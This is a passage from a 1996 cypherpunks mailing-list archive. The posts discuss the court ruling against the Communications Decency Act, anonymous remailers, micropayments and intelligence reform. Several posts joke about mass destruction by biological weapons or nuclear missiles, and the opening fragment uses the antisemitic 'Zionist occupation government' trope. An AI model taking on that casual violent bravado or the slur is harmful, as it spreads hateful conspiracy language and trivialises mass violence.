right wing gun owning Cult preaching tax evasion & armed revolt against
the Zionist occupation government.
	Ok, I could think of 4 last night, but one slipped my mind
tonight.

	Before anyone kicks off into my ass about this, for four years of
my life I was paid to be prepared to kill at any time, and boredom can
lead to some very strange conversations.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 12 Jun 1996 19:15:49 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: plugging in
In-Reply-To: <199606111805.NAA03561@proust.suba.com>
Message-ID: <Pine.LNX.3.93.960612005436.295B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jun 1996, Alex Strasheim wrote:

> > Indeed -- the notion is that one could do things like put support for
> > encrypted/signed pages or other cryptographic tools (I haven't checked
> > if Netscape mail handles plugins, too) directly into Netscape where
> > ordinary users could smoothly use them.
> 
> Doing tech support at my ISP has made me very skeptical of anything that
> requires a plug in.  Most people aren't willing or able to download and
> install them.  Obviously that's not a problem for large organizations who

	As Mr. Strasheim's front line in tech support, would like to add
capable. Many people simply cannot understand enough of what they are
doing to put things in the right places. 

	It gets very trying some times. See my post on murder. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 12 Jun 1996 16:33:21 +0800
To: cypherpunks@toad.com
Subject: Information Age Intelligence
Message-ID: <199606120115.BAA01339@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Foreign Policy, Summer 1996: 
 
   "Information Age Intelligence." by Bruce D. Berkowitz, 
   a former CIA analyst and staff member for the Senate 
   Intelllgence Committee. Excerpts of 14-page essay: 
 
      During most of this century, the intelligence 
      community led the world in developing information 
      technology. Intelligence organizations were deeply 
      involved in the development of telegraph and 
      telephone networks, modern computers, and 
      space-based communications and surveillance 
      systems. The intelligence community also 
      established new forms of analysis and areas of 
      expertise. 
 
      Yet several signs suggest that the intelligence 
      community is no longer the leader in the 
      information world, and it may have fallen behind 
      significantly in some respects. The underlying 
      problem is that the intelligence community has 
      failed to keep up with changes in how modern 
      society uses information and how information 
      technology develops in modern society. As a 
      result, our model for intelligence is out-of-date. 
      This reality is what current efforts at 
      intelligence reform are failing to recognize. 
 
      The intelligence community needs to move as fast 
      as information businesses do to capture markets, 
      but the traditional organization is not up to the 
      task. Today's model for intelligence -- how it is 
      organized and how it operates -- is an artifact 
      from an earlier age. Even the name "Central 
      Intelligence Agency" is reminiscent of the New 
      Deal era, when large, powerful, national 
      bureaucracies were the accepted way of getting 
      things done efficiently. It makes less sense in a 
      world moving toward fluid, distributed, networked 
      information organizations. 
 
      As the capabilities of the private sector improve, 
      the intelligence community will need to move on to 
      the next frontier of technology or expertise that 
      the private sector has yet to fill. While one 
      challenge for intelligence reform is to keep up 
      with these changes, fundamentally the greater 
      challenge will be to establish an organization 
      that can adapt with the times. 
 
      One reason why the intelligence community cannot 
      deal effectively with the Information Revolution 
      is that intelligence requirements and the 
      intelligence community's comparative advantage are 
      both fluid, but the traditional intelligence 
      bureaucracy remains static. In addition, 
      organizations responsible for developing and 
      applying technology, such as the National 
      Reconnaissance Office (NRC)) and the National 
      Security Agency (NSA), have created organizational 
      dogma, and dogma always resist change. Once such 
      organizations carve out a place for themselves 
      (and their technologies) in the budget, they can 
      be difficult to dislodge. The fact that these 
      organizations often operate at a classified level 
      further insulates them. As a result, the 
      intelligence community often locks into specific 
      technologies, even when new and possibly better 
      ideas have come along. 
 
   http://pwp.usa.pipeline.com/~jya/fpintel.htm 
 
----- 
 
Our Web site was hosed clean today, so this article may 
not survive. If not there, send us e-mail with the 
subject: FPI_ntl 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Wed, 12 Jun 1996 19:03:31 +0800
To: cypherpunks@toad.com
Subject: [Tiny bit o noise] was Re: Terrorism Hysteria on the net
Message-ID: <199606120655.BAA07112@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 PM 6/11/96 -0700, you wrote:
>
>snow  wrote:
>
>>>Give me 15 well trained soldiers(near special forces level) and
>>>I can do it in less than 60 days. Without touching a computer.
>
>Gary Howland <gary@systemics.com> adds:
>>Give me 10 well trained biological warfare scientists and I'll do
>>it in 30 ...
>
>>Anymore bids?  :-)
>
>Yeah, Give me one really sick monkey .....
>
>Brian
One final bid...
 
Give me one nanotech manufacturing facility and I can screw the
Universe. :)
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Holmberg <dholmbrg@ncfcomm.com>
Date: Wed, 12 Jun 1996 19:43:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606120733.CAA18734@cereal.ncfcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Please show me what this list is like, as I read in the message.
dholmbrg@ncfcomm.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Wed, 12 Jun 1996 16:48:41 +0800
To: eric traudt <eric@clever.net>
Subject: Re: [Noise] William Safire on the GAK bastards' other privacy violations.
In-Reply-To: <v02140b00ade2700d75f4@[204.249.244.13]>
Message-ID: <Pine.3.89.9606120211.A17815-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


	Eric:

On Mon, 10 Jun 1996, eric traudt wrote:

> WASHINGTON (Jun 10, 1996 12:00 p.m. EDT) -- Overlooked in the scandal of
> Travelgate has been the failure of FBI Director Louis Freeh to protect the
> confidential files of citizens from political snoops. Say what you like 
	
> for what lawful purpose? Can any anonymous bureaucrat requisition, 
> rifle through and remove confidential records? How come not one agent 

	I don't have a copy of the law, but it was passed a few years
	ago. << Telecommunications Act of 1994 --- didnt' just allow
	any politicians, to wiretap anybody without a court order,
	but also allowed them to obtain, and retain any records they
	wanted, from any law enforcement body, without any questions. 
	Note just federal, but state, county and local politicians as
	well.  >>

> was required by bureau policy to ask why not even initials appeared on 
> hundreds of requests to check up on Republicans?

	Given the above, I suspect that no signatures are needed.

	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Wed, 12 Jun 1996 23:26:01 +0800
To: cypherpunks@toad.com
Subject: Correction to "Hackerpunks and C2"
Message-ID: <199606121125.LAA17769@avignon.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


There was a minor error in my earlier post. If someone were to notice a
node on the internet receiving a bag with L(In)=L(Posted) *before* any
other nodes on the internet, then one could guess that node had a user who
was the owner of Hackerpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 13 Jun 1996 02:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
In-Reply-To: <199606120647.XAA03328@dns1.noc.best.net>
Message-ID: <wkRePD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com writes:

> At 12:40 PM 6/11/96 -0700, Timothy C. May wrote:
> > the "net.war" declared by some on
> > the Church of Scientology is little different than having a similar war
> > against Catholics, Rosicrucians, Parsees, whatever.
>
>
> There is a very great difference:  Scientology made war on the net.
>
> The Catholics, Rosicrucians, whatever, have not.

Who started it?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 13 Jun 1996 02:51:23 +0800
To: cypherpunks@toad.com (Good Guys)
Subject: Court Blocks CDA
Message-ID: <199606121202.IAA12765@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text



CNN reports court blocks CDA

-- 
Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 13 Jun 1996 02:14:01 +0800
To: cypherpunks@toad.com
Subject: Encrypting forwarding service?
Message-ID: <199606121226.IAA24371@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



How does this idea sound: a forwarding service/remailer that accepts 
encrypted and forwards it to someone else (specified in the message), 
encrypting the message to that person.

Such a service can be set up at a site with *lots* of keys given to 
it.  This way if one wants to spontaneously send a message to someone 
that she doesn't have a key for, she can use the service.  (Perhaps 
the service would only accept or forward mail from/to people who 
submitted their keys, and possibly eca$h... it could also bounce 
messages back, re-encrypted, if there's a failure...)

This could be used like anonymous remailers to foil traffic analysis, 
but also for people who, in certain situations, don't want/need 
anonymitiy with the person they are corresponding with, and who don't 
necessarily have keys handy.

Comments?

Rob.







---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Thu, 13 Jun 1996 03:37:29 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <31BDA18F.2C67412E@systemics.com>
Message-ID: <Pine.BSI.3.91.960612084154.4976A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jun 1996, Gary Howland wrote:

> >         Give me 15 well trained soldiers(near special forces level) and I
> > can do it in less than 60 days. Without touching a computer.
> 
> Give me 10 well trained biological warfare scientists and I'll do it
> in 30 ...

    Give me 3 ICBM nukes and I'll do it in 1.

                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <scott.harney@bigeasy.com>
Date: Thu, 13 Jun 1996 03:47:12 +0800
To: pgp-users@rivertown.net
Subject: Re: CDA decision TOMORROW 9 am! (fwd)
Message-ID: <199606121440.IAA00200@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


Guess I was logged in at the right time this morning.  Judges ruled 
3-0 that the CDA is unconstitutional.  hooray.

I thought a little rejoicing was warranted. :)

me
------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                                59 0A 01 E3 AF 81 94 63 
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 13 Jun 1996 08:52:54 +0800
To: "Timothy C. May" <tcmay@sybase.com>
Subject: Re: Slander of Catholic Church
Message-ID: <9606121645.AA01963@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


>Thanks, Attila. I think Paul Penrod and the Archangel Moroni missed my main
>point. I was not singling out Mormonism for special criticism, just using
>it as an example of a "cult" or "religion" which is in many ways even more
>"outre" to many of us than Scientology is. Belief that a body rotting in
>the ground can be baptized into one's church is at least as odd as
>believing that Mankind is descended from the survivors of spaceships
>fleeing an evil overlord.

A point of clarification:

It's not the bodies that are baptized, but the spirits, by proxy.
You don't think we dig 'em up do you?

The point being that even if you've never heard of Christ 
(a billion people in China for example) you've still got a shot.
Most christian religions don't allow for that.

I mention this in case any of the folks who are being subjected to
this discussion on this list were wondering what the heck you
were talking about.  We are a missionary church, after all.

As far as the COS goes...Well, a lot of info that the Mormon church 
would prefer to keep secret has been published, but I don't think
the First Presidency has been running around suing everyone.

     Ryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 13 Jun 1996 07:38:17 +0800
To: cypherpunks@toad.com
Subject: CDA Decision Online
Message-ID: <v02140b00ade495acee5d@[17.128.203.171]>
MIME-Version: 1.0
Content-Type: text/plain


http://www.aclu.org/court/cdadec.html

(250 KBytes)

Martin.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Walberg <umwalber@cc.UManitoba.CA>
Date: Thu, 13 Jun 1996 04:25:24 +0800
To: cypherpunks@toad.com
Subject: What constitutes a remailer?
Message-ID: <Pine.SOL.3.91.960612090350.20306A-100000@merak.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


What really constitutes a remailer (pseudo-anonymous vs anonymous 
arguments aside)?  For example, the other day I received a message from 
66west.com saying that I had a greeting card waiting, I was to go to a 
certain URL and enter a simple password to retreive my "greeting card".  
Now this card had no return address, no name.  Could this constitute a 
remailer?  A while back there was a thread on how to take some of the 
responsibility off of the remailer operators (the last one in the chain 
more so), could this be a viable alternative?  (Actually, I believe it 
was discussed).  As for tracking, I'm sure the server logs are rotated 
often, and are not kept forever (our student page server here rotates 
daily and logs are kept for 4 days AFAIK), so perhaps this may even be 
less traceable.  Using these greeting cards, what prohibits me from 
sending a letter instead of "happy birthday"?

Will the anti-remailer people crack down on this also?  I can just see 
the law "Thou shalt not send greeting cards via email without photoID" 
:-) 

Sean

------------------------------------------------------------------
Sean Walberg                              umwalber@cc.umanitoba.ca
The Web Guy                  http://home.cc.umanitoba.ca/~umwalber 
UNIX Group, U. of Manitoba          PGP Key Available from Servers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Thu, 13 Jun 1996 06:24:35 +0800
To: "Stephan Vladimir Bugaj" <vznuri@netcom.com>
Subject: Re: Micropayments are Crap
Message-ID: <ADE43BCA-8C08F2@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


I apologize in advance for this overly long post, but Stephan had a number
of arguments that I disagree with quite strongly.  In general, I think
micropayments are a good idea that should be tested where it counts, in the
marketplace.

	Clay

----------
Stephan Vladimir Bugaj <stephan@studioarchetype.com> wrote:

>Any cryptographic system has ways to circumvent it.  Whether or not they
>are practical is the issue.

How is this an argument against micropayments?  Lets just throw up our
hands and say that all crypto is theoretically breakable, therefore we
won't encrypt anything.

>Because the time limit can be set ridiculously low, making the rates
>artificially high from the viewpoint of the kind of time periods that
>humans work in.

Huh?

>The action of going somewhere that charges a metered rate is initiated by
>the
>user, however to make this safe for the consumer it would have to be
>required
>that there be a 'front door' for every site that charged metered rates
>announcing that if you proceed you'll be billed (and, at what rate).  If
you
>let people charge as soon as you hit their URL, that's malarkey.

Why is this malarkey?  What is wrong with saying "If you want to see my
page, it will cost you $.02?  Why would a "front door" make it any safer
for consumers?  I set my browser so that I spend no more than $1/hour or
$.02 on any one page without asking me.  How difficult is this concept?

>time, they should consider another payment system.  Same thing with
charging
>micropayments for using software.  If Adobe started charging me $5/hr to
use
>Photoshop instead of $500 for the package, I'd stop using photoshop.  In
two
>weeks I'd have already exceeded the price of the whole package.

Of course, there is lots of software that I only use once in a while, yet
spend large $$ on to have sitting on my machine metaphorically gathering
dust.  Micropayments would be very useful for this software.  On the other
hand, there is some software that I may want to buy outright.  This is not
an exclusive system.  BTW, any impression that you have that you are
currently buying unmetered software is false.  Don't you spend xx$/year to
run Photoshop in the form of "product upgrades" - or are you still running
version 1.0?

>The potential for scams exists.  Certainly even a priest in the church of
>the
>free market can see that.  User education is poor, and consumer protection
>laws
>are weakening.  This does not bode well fo r

I tend to disagree with most arguments for "consumer protection", so this
argument falls upon deaf ears.  There are lots of scams with every form of
money (cash, credit, even barter - if I trade you a lawnmower that only
runs for an hour afterwards, I have scammed you), how does this make
micropayments any more undesirable than any other form of payment?

>>uh huh. what if over your lifetime it cost far less than you pay for
>>a shinkwrapped package?
>>
>If that happened, I'd be very suprised.

Name some software that you have used less than 10 times in the past year. 
If you use a computer much, you might be surprised to find that you have a
long list.  I know I do.

>>what if you only needed a quick compilation on
>>a system you don't normally use? I think you will begin to figure out
>>some advantages if you use your imagination to find them (instead of the
>>drawbacks)
>>
>That is a good advantage, you are correct in this.  But there are a number
>of
>instances in which I'd still want software running on a real workstation. 
>If
>people make software only available through micropayments, then that would
>be
>limiting to both the user and the vendor.

What is to say that micropayments won't authorize an extended license for
software you have on YOUR machine - i.e. I download some software, to use
it for a day I pay $1 and get a 1-day license.  The software is local.  Of
course, this doesn't preclude you from paying $1 to run it on a
supercomputer that you wouldn't normally have access to ...

>The payer could set a certain amount of money that is automatically deemed
>acceptable to pay, like the $.02/time-unit example.  This could get
misused
>by a vendor who chooses a unit small enough that a small per-unit charge
>quickly
>adds up.  The payer essentially loses control of payment.

Wrong.  

>But those of use who use certain packages heavily would get
>shafted for our loyal support of a vendor if they decided to pander to the
>skittish masses and charge a rate that was psychologically more appealing
>to
>those who wouldn't otherwise use it.  I only hope that vendors who choose
to
>use micropayments (since they're inevitable) take the small but loyal
power
>user segment into consideration when making the decision about whether or
>not
>to stop selling full packages altogether.

Why would you be shafted?  Do you think vendors would be willing to throw
away your business?  Look at your previous example of the ISPs, some
individuals pay a metered rate, others a flat rate - why would software use
be any different?

>I'm quite tempted to cut up both my credit card and ATM card because of
the
>bullshit administrative fees involved with using them.  Internet
transaction
>fees are even worse.

Of course, now you can get credit cards thay pay you between 1% and 3% per
transaction ...

>Change doesn't bother *me* personally, I just wish more people would
*think*
>about whether or not changes are *appropriate* instead of just *possible*.

Why should people think about this?  Let the market decide - if people try
it and fail, it will go away.  If it suceeds, then it is obviously useful
to some consumers.

>That's not infeasable.  I didn't say anything was infeasable, I just think
>some of the current models of how things might work are bad ideas and
>encourage
>debate.  Both consumers and resistant old-school vendors will have issues
to
>address, and ramming change down people's throats because it's inevitable
or
>'the market dictates it' is a crappy attitude which I don't encourage. 
>Also,
>note for the record that I don't believe that "the market" is a one-to-one
>mapping on to "the people" or even "the consumer".

Well, the market works.  Sorry you don't believe in reality.

>Ha ha ha.  Yeah, looking out for consumer interests is just doom saying
and
>negativism.  The current education level of the general public about
>computers
>is low, and about transactional security is even lower.  It can have
>benefits,
>but there are also serious issues which need to be considered.  Another
>thing
>about the paying a micropayment instead of a macropayment and leaving if
>you don't like it - a lot of companies offer free trial time with their
>service, or a free consultation, etc.  The effects of charging for these
>trial offers is
>unclear - how would that be good for the consumer?

Those poor consumers, what would they do without you looking out for them? 
I personally could care less if someone gets scammed - let the buyer
beware.  

>>imagine shareware authors getting cash for their programs based on their
>>actual use. imagine artists and writers bypassing corporate monoliths
>>and marketing their work to the public directly, bypassing the enormous
>>scrape-off that these self-perpetuating bureacracies snarf.
>>
>This is a good idea.  It could be a good boon for small businesses (unless
>the transaction providers charge prohibitively large fees for their
>services...).  I hope you're right and I'm wrong.  That would be much
better
>for all involved.

If the fees are too large, NO ONE WILL BUY THEM!  Basic economics.

>Your argument works provided the consumer really maintains control.
>You can lose that control.  There do need to be safeguards in such a
system
>that ensure this control.  $.02/nanosecond is, after all, $1.2 billion/
>minute.
>If such a setting were allowed and people habitually allowed $.02/unit
>metering as being automatically acceptable, that could clean out a number
>of digital
>wallets very quickly as unsuspecting customers entered the paid area and
>instantly got dialogue boxes announcing that their wallets were empty.

Do you really think people don't know the difference between $.02/minute
and $.02/nanosecond?  Do you think software cannot easily distinguish the
difference?  Let's argue from a basis in reality here!

>
>ttl
>Stephan
>
>
>-------------------------------------------------------------------
>This signature has been kidnapped by space aliens.
>If you find it you can call (415) 703-8748.
>I work for Studio Archetype, and they don't find any of this funny.


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@kiwi.cs.berkeley.edu>
Date: Thu, 13 Jun 1996 08:38:04 +0800
To: cypherpunks@toad.com
Subject: Anonymous remailers mentioned in CDA decision
Message-ID: <199606121625.JAA17962@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's a paragraph from the findings in this morning's CDA decision.
I'm happy to see that we're considered an integral part of the
Internet, rather than as a fringe cyber-terrorism threat.

Overall, I found the decision to be balanced, well written, and
extremely thoughtful.

Raph

[ excerpted from http://www.vtw.org/speech/decision.html ]

[ from the undisputed findings of fact ]

           Obstacles to Age Verification on the Internet

          90.  There is no effective way to determine the
identity or the age of a user who is accessing material through
e-mail, mail exploders, newsgroups or chat rooms.  An e-mail
address provides no authoritative information about the
addressee, who may use an e-mail "alias" or an anonymous
remailer.  There is also no universal or reliable listing of e-
mail addresses and corresponding names or telephone numbers, and
any such listing would be or rapidly become incomplete.  For
these reasons, there is no reliable way in many instances for a
sender to know if the e-mail recipient is an adult or a minor.
The difficulty of e-mail age verification is compounded for mail
exploders such as listservs, which automatically send information
to all e-mail addresses on a sender's list.  Government expert
Dr. Olsen agreed that no current technology could give a speaker
assurance that only adults were listed in a particular mail
exploder's mailing list.

[ ... ]

                             Anonymity
          121. Anonymity is important to Internet users who seek
to access sensitive information, such as users of the Critical
Path AIDS Project's Web site, the users, particularly gay youth,
of Queer Resources Directory, and users of Stop Prisoner Rape
(SPR).  Many members of SPR's mailing list have asked to remain
anonymous due to the stigma of prisoner rape.

[ from views submitted by the parties in response to Order dated March
13, 1996 ]

22. Arguably, a valid CDA would create an incentive for overseas
pornographers not to label their speech. If we upheld the CDA,
foreign pornographers could reap the benefit of unfettered access
to American audiences.  A valid CDA might also encourage American
pornographers to relocate in foreign countries or at least use
anonymous remailers from foreign servers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 13 Jun 1996 04:24:28 +0800
To: cypherpunks@toad.com
Subject: Fight-Censorship Dispatch #14: CDA VICTORY!!!
Message-ID: <v01510108ade487198a3b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





-----------------------------------------------------------------------------
                      Fight-Censorship Dispatch #14
-----------------------------------------------------------------------------
                              CDA VICTORY!!!
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: Philly judges deal death blow to CDA, 3-0 decision
                  Press confererences and rallies


June 12, 1996

WASHINGTON, DC -- It's finally over, and it's about fucking time.

Our lawsuit seeking to overturn the ill-begotten Communications Decency
Act has succeeded in its first phase, two years after Sen. Jim Exon
(D-NE) first introduced the act. The three-judge panel struck down
both sections of the CDA in a unanimous decision.

Even Judge Ronald A. Buckwalter got a clue in the end.

The ACLU will have the text of its decision online at its web site by 11
am today. HotWired is putting together an extensive special report that
will go live this evening, including interviews with attorneys and
advocates on both sides of the issue.

Justice Department lawyers, unfortunately, declined to be interviewed
for it. Why? Let's just say they're not breaking out the champagne over
at DoJ headquarters over on tenth street.

And now, on to the Supreme Court...


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                       PRESS CONFERENCES AND RALLIES
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

ACLU attorneys will hold a press conference at 11 am today at the
group's headquarters: 132 West 43rd Street, 5th floor, NYC. Contact
Emily Whitfield at 212-944-9800 x426, emilyaclu@aol.com. ACLU and ALA
plaintiffs will attend.

At noon today, CIEC representatives including Bruce Ennis (Jenner &
Block), Jerry Berman (CDT), and Bill Burrington (AOL) will hold a press
conference at Jenner & Block, 601 13th St. NW, Washington, DC. Contact
Sydney Rubin at 202-828-8829.

There's a New York City rally in Silicon Alley at 6:30 pm today at 626
Broadway, Suite 3-A. Contact: Shabbir Safdar (VTW) at 718-596-7234,
shabbir@vtw.org.

Pittsburghers will rally in defense of free speech online at 4 pm today
on the steps of the Oakland Branch of the Carnegie Library, on Forbes
Avenue adjacent to the campus of the University of Pittsburgh. Contact:
Josh Knauer at 412-683-6400, josh@envirolink.org.

HotWired is holding a live WiredSide chat with ALA/CIEC attorney Bruce
Ennis this evening.


-----------------------------------------------------------------------------

COPYRIGHT UPDATE: The House markup of HR2441 tentatively scheduled for
June 13 has been postponed indefinitely. My sources tell me that this
probably means the bill's dead this session.

HotWired's live WiredSide chat with ALA/CIEC attorney Bruce Ennis:
  http://www.hotwired.com/wiredside/

Relevant web sites:
  <http://www.aclu.org/>
  <http://www.vtw.org/>
  <http://www.epic.org/>
  <http://www.eff.org/>
  <http://www.ala.org/>
  <http://www.cpsr.org>
  <http://www.cdt.org/>

This document and previous Fight-Censorship Dispatches are archived at:
  <http://fight-censorship.dementia.org/top/>

To subscribe to future Fight-Censorship Dispatches and related
announcements, send "subscribe fight-censorship-announce" in the body
of a message addressed to:
  majordomo@vorlon.mit.edu

-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobpal@cdt.org (Bob Palacios)
Date: Thu, 13 Jun 1996 04:08:12 +0800
To: cypherpunks@toad.com
Subject: We Won! Injunction granted against CDA
Message-ID: <v02140b03ade47bfff40a@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


Text of the decision is available at http://www.cdt.org/ciec/.


-----
Bob Palacios, Online Organizer/Sysop     Center for Democracy and Technology
<bobpal@cdt.org>                             1634 Eye Street, NW  Suite 1100
                                                        Washington, DC 20006
http://www.cdt.org                                       (v) +1 202 637 9800
http://www.cdt.org/homes/bobpal/                         (f) +1 202 637 0968

           FIGHT INTERNET CENSORSHIP! Visit http://www.cdt.org/ciec






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Thu, 13 Jun 1996 05:29:01 +0800
To: cypherpunks@toad.com
Subject: ALERT: We win!  Court rules 3-0 for free speech!
Message-ID: <199606121405.KAA21482@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


============================================================================
__     _________        __
\ \   / /_   _\ \      / /          FREE SPEECH WINS IN COURT!
 \ \ / /  | |  \ \ /\ / /          THE COURT DISSES THE CDA 3-0
  \ V /   | |   \ V  V /                    
   \_/    |_|    \_/\_/         NETIZENS CELEBRATE WITH FIREWORKS

              Redistribute this intact until June 15, 1996
                    URL:http://www.vtw.org/speech/

----------------------------------------------------------------------------
Table of Contents
        News
        How can I help spread the word?
        Rally information for NYC and Pittsburgh
        Press information

----------------------------------------------------------------------------
NEWS

WE WIN!

After 18 months of work, netizens finally got the justice they so
richly deserve.  The three-judge panel in Philadelphia issued a ruling
today saying that they had examined the Communications Decency Act,
learned about the Internet as a medium, and concluded that the law is
an inappropriate method of regulating cyberspace.  This decision
establishes an overwhelmingly positive precedent for the final decision
by the Supreme Court, expected early next year.

The famed "Question Mark" icon that had started popping up all over the
WWW changed simultaneously at 9:09am from a question mark to fireworks,
as thousands of Netizens began the mad rush to obtain a copy of the
court decision celebrating their victory.  You can read a copy of the
decision or obtain a copy of the icon yourself at
http://www.vtw.org/speech/

Senator Feingold (D-WI) said today, "This is welcome news for all of us
who not only support free speech, but who also want to see this new
dynamic communications technology develop safe from the threat of
censorship."

Feingold continued, "This issue is larger than so-called 'adult'
expression or communications.  It is about whether the government will
decide what we see, hear, and write."

Join millions of other netizens as they read the decision, rally, celebrate,
and thank the court for taking the time to do what some members in Congress
and the President would not do: apply the First Amendment. 

----------------------------------------------------------------------------
HOW CAN I HELP SPREAD THE WORD

It's crucial that people turn out for the rallies, as well as spread the word
about the decision.  You can help in a number of ways outlined below.

1. ATTEND THE NYC/PITTSBURGH RALLIES
If you are anywhere close to the locations of the Pittsburgh or New York
City rallies, please attend and brings lots of friends!

If you are an Internet provider in New York, please place the following
message in your message of the day:

        THE COURT ISSUED A RULING TODAY IN THE INTERNET FREE SPEECH CASE
        ON THE COMMUNICATIONS DECENCY ACT.  A RALLY IS BEING HELD IN
        NYC AT OUTERNET (BWAY.NET) @ 626 BROADWAY AT 6:30PM.  FOR MORE
        INFORMATION SEE http://www.vtw.org/speech/ OR CALL OUTERNET AT
        212-982-9800.

If you are an Internet provider in the Pittsburgh area, please place the
following message in your message of the day:

        THE COURT ISSUED A RULING TODAY IN THE INTERNET FREE SPEECH CASE
        ON THE COMMUNICATIONS DECENCY ACT.  A RALLY IS BEING HELD ON
        THE STEPS OF THE OAKLAND BRANCH OF THE CARNEGIE LIBRARY AT 4PM.
        FOR MORE INFORMATION SEE http://www.envirolink.org/ OR CALL 
        412-683-6400.

2. LINK TO THE TEXT OF THE COURT'S DECISION
The text of the decision will be posted at http://www.vtw.org/speech#decision
Link to it from your page and help spread the word about th case that
will decide so much of the future of free speech online.

        THE COURT ISSUED A RULING TODAY IN THE INTERNET FREE SPEECH CASE
        ON THE COMMUNICATIONS DECENCY ACT.  WHILE NETIZENS RALLY IN NEW
        YORK AND PITTSBURGH, YOU CAN READ THE DECISION ONLINE AT 
        http://www.vtw.org/speech/index.html#decision

----------------------------------------------------------------------------
RALLY INFORMATION FOR NYC AND PITTSBURGH

